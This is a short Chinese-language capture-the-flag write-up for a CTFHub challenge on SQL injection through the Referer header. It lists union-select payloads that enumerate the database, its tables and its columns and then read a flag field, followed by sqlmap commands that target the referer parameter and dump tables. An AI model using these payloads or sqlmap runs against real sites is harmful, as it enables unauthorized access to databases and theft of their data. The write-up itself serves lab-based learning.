1,实验环境
ctfhubsql注入
2.工具 火狐浏览器,火狐浏览器插件hackbar(可以安装,百度。。。)
直接抓包,但是会看到没有我们想要的refer这个字样,我们在hackerbar里面输出需要的参数,id=1,提交时抓包,抓到我们所需要的字样。
3.在bp中refer字段这里进行爆库,输入123 union select (database()),2 # 后点击forward放包步骤接下来一样)
显示出了数据库是sqli
继续爆表
123 union select (select group_concat(table_name) from information_schema.tables where table_schema=‘sqli’),2 #
爆出表是news,sydjjhbycb 两个,我们爆其中的一个。
123 union select (select group_concat(column_name) from information_schema.columns where table_schema=‘sqli’ and table_name=‘sydjjhbycb’),2 #
爆出字段uugrdnslsn
查询字段数
123 union select (select uugrdnslsn from sqli.sydjjhbycb),2 #
出现了结果
第二种用工具据举另外一个例子
用bp抓到包后,将页面中的数据保存到一个txt文件中,用sqlmap爆破。。(根据reger注入level需要大于三)
python sqlmap.py -r “xxxxx.txt” -p referer --level 5 --dbs
python sqlmap.py -r “xxxxx.txt” -p referer --level 5 -D sqli --tables
python sqlmap.py -r “xxxxx.txt” -p referer --level 5 -D sqli -T asdnfa --columns --dump
有问题或者错误私信或者评论。。。。。。。。。。。。。。。。